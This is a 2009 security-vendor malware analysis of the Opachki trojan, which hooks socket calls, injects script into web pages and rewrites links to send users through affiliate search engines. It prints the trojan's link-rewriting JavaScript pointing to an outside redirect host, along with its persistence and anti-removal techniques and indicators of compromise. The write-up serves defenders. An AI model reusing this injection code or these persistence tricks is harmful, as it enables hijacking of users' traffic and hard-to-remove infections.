Opachki Link Hijacker Trojan Analysis | Dell SecureWorks

Opachki Link Hijacker Trojan Analysis

  • Date: November 02, 2009
  • Author: Joe Stewart, Director of Malware Research for the Counter Threat Unit (CTU)

Opachki is one of many software tools developed by criminals to hijack and monetize Windows users' search traffic using affilate-based search engines that are ultimately advertiser-sponsored, sometimes by well-known and respected firms. Each search-hijacking-by-malware scheme that the SecureWorks Counter Threat Unit (CTU) has uncovered so far seems to have a different twist, and the Opachki trojan is no different. Instead of only hijacking search result links, Opachki attempts to hijack as many links as it can on any web page, using the text enclosed by the HTML HREF tag as a faux search phrase when redirecting the user to an affiliate-based search engine.

Opachki carries out this link hijacking using a small bit of JavaScript code that is injected into the top of HTML pages. The procedure is as follows:

  1. After using the Microsoft SetWindowsHookExA API call to load its DLL into other programs running on the system, Opachki hooks the "send" and "recv" (also WSASend and WSARecv) socket API calls of that program and redirects them to functions within Opachki's code.
  2. When Opachki detects a "send" socket request on TCP port 80, it checks the payload for the Accept-Encoding HTTP header and overwrites the first part of the value of that header with a repeating character. This technique disables compressed encodings such as gzip or deflate from defeating the script injection code.

    For example, an HTTP request like the following:

     
        GET / HTTP/1.1 
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* 
        Accept-Language: en-us 
        Accept-Encoding: gzip, deflate 
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
        Host: www.example.com 
        Connection: Keep-Alive 
        

     

    Might be changed to the following:

     
        GET / HTTP/1.1 
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* 
        Accept-Language: en-us 
        Accept-Encoding: bbbbbbbbblate 
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
        Host: www.example.com 
        Connection: Keep-Alive 
        

     

  3. When a "recv" socket call is performed on TCP port 80, Opachki checks if the request matches the standard response for successful HTTP requests string "*HTTP*200 OK*" (using wildcard expansion to match any variations), indicating the received buffer contains the beginning of an HTTP response.
  4. If Opachki detects the HTTP 200 response header, it then checks the buffer for the string "<HEAD>" or "</TITLE>" (case insensitive). If one of those string are found, Opachki inserts an HTML script tag after the end of the found tag. The injected tag may look like the following:

    scriptcontent2

  5. Additional JavaScript provided by the Opachki author is then downloaded by the browser. This JavaScript can change at any time, but the following code has been seen:

     
      function run()
      {             
          var links = document.getElementsByTagName("a"); 
          var url="http://greatfeedmillxxxxxxxxxxxx.com/?do=rphp&sub=246&b=127001";
          var q="";                                                         
      
          for (var i=0; i < links.length; i++)
          {
              q=links[i].innerHTML.replace(/<\/?[^>]+>/gi, '');
      
              if(q!="" && links[i].href.indexOf('&orig=')<=0)
              {
                  links[i].href=url+'&q='+escape(q)+
                  '&orig='+escape(links[i].href);
                  links[i].target='_self';
              }
          }
      }
      window.setTimeout("run()",500);
      window.setTimeout("run()",1000);
      window.setTimeout("run()",2000);
      window.setTimeout("run()",3000);
      window.setTimeout("run()",4000);
      window.setTimeout("run()",5000);
      window.setTimeout("run()",10000);
      

     

    The code above iterates through the HTML page and replaces existing HREF links with links to the malicious site, which handles the redirection to the affiliate search sites.

    For example, a link such as:

    url

    would be replaced by:

    urlreplace

  6. After several redirects, the user ends up viewing a search query result on one of several affiliate-based search engines that credit the Opachki author with a small amount of money if the user clicks through any of the resulting links.

    affiliatesearchengine3

    Opachki also hooks "send" calls to TCP port 5190, used by AOL Instant Messenger or other IM clients using the OSCAR protocol. Opachki looks for outbound messages from the client, and increments an internal counter for each sent message. The purpose of this behavior is unclear, as the counter does not appear to be used in the Opachki code. It could be a precursor to not-yet-written code that may be used to replace links in instant messages, but this is speculative.

Opachki Characteristics
Here is some basic information that may assist in identifying Opachki samples or traffic:

Dropper file size: 31,232 bytes
Dropper MD5 hash: 2ded7ee112cea2db509ba95dc09fded6
DLL file size: 23,552 bytes
DLL MD5 hash: 032e8fced2fbed146c30a47d4989804b
Decrypted strings: *HTTP*200 OK*, Set-cookie: xxx, Change-url:, Change-uid:, _IWMPEvents, c:\ntldrs

Most of these characteristics will change from sample-to-sample and are only given for reference purposes.

Installation
Opachki is typically installed via "drive-by" browser exploits. There is an executable dropper component that loads an embedded DLL file. The DLL installs itself in several system locations to ensure continued execution on the infected machine.

These locations are:

  • The user's Documents folder, as "ntuser.dll"
  • The user's Temp folder, as "rundll32.dll"
  • The user's Startup folder, as "scandisk.dll"
  • The system32 directory, as "calc.dll"

 

Using user as well as system paths ensures that the trojan will operate even if the user does not have administrator privileges on the infected machine.

Opachki uses the following registry keys to ensure the trojan DLL is loaded at boot or login time, again using both user and system accessible registry keys:

 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
    "calc" => "rundll32.exe C:\\DOCUME~1\\Owner\\ntuser.dll,_IWMPEvents@0" 
 
HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Run 
    "calc" => "rundll32.exe C:\\WINDOWS\\system32\\calc.dll,_IWMPEvents@0" 

 

Since the DLL is loaded into every non-console application, it is difficult to remove the trojan because the DLLs are in use and are regularly rewritten by the trojan. Opachki also hooks the RegDeleteValueA and RegDeleteValueW API calls and prevents deletion of registry keys that contain any of the DLL names listed above. Additionally, Opachki disables the SafeBoot service configuration to prevent removal of the trojan using safe boot mode.

ZeuS/Zbot Removal
Perhaps one of the most curious aspects of Opachki is that it has routines dedicated to removing the ZeuS (aka Zbot, PRG) trojan from systems it infects. Opachki looks for one of several well-known ZeuS executable paths, and if found, renames the file to "C:\ntldrs", preventing ZeuS from maintaining an infection on the system.

The motivation behind this action is unclear. It could occur because ZeuS hooks the "send" and "recv" calls in a similar manner as Opachki, which might disrupt Opachki's ability to inject data into HTTP streams. There is also the remote chance that the Opachki author could be hijacking ZeuS installations to deploy the trojan. As ZeuS has a downloader component that looks for updates at a predetermined URL, it would be possible for a hacker who gained access to a ZeuS server to replace the update with their code, piggybacking one botnet onto another. Whatever the reason, an infected user would likely benefit from having ZeuS disabled, criminal groups using ZeuS would no longer have the opportunity to compromise financial credentials.

Side Effects
The removal of any ZeuS trojans present on the system might be a beneficial side effect of the Opachki trojan; however, there are other negative effects that result from code injection into the HTTP stream.

  • The affiliate search engines used by Opachki might be more likely to include advertising from pay-per-install malware sites, which could expose the victim's computer to becoming infected with even more malevolent trojans in the future.
  • IPS/IDS signatures looking for malware "phone-home" requests might be blinded by the alteration of the Accept-Encoding header, so other infections on the system might not be detected.
  • Hooking of all send/recv calls on port 80 will lead to a slight decrease in overall HTTP throughput speeds.
  • Because the possibility of HTTP response compression is disabled by Opachki, the Internet bandwidth used by the infected computer will increase, affecting download speeds to an even greater degree and possibly causing increased costs for users on metered Internet connections.

Conclusion
Opachki demonstrates that even a "benign" threat such as a search/link hijacker has additional risks and costs that sometimes go unseen. For this reason, any trojan infection should be quickly resolved. Manual removal of Opachki is extremely difficult, given the many methods it uses to maintain its code on a system. Because of these difficulties and also because of other unknown trojans, worms or viruses Opachki may have downloaded, the recommended method of removal is to reformat and reinstall the operating system from known good media.

Next Steps

Contact Us Call Us Today
(877) 838-7947
UK +44 131 260 3044

SMB SOLUTIONS

Online Tools

  • Print this Page
  • Share This Resource






By completing this form you'll be opting in to receiving future communications about products and services from Dell SecureWorks.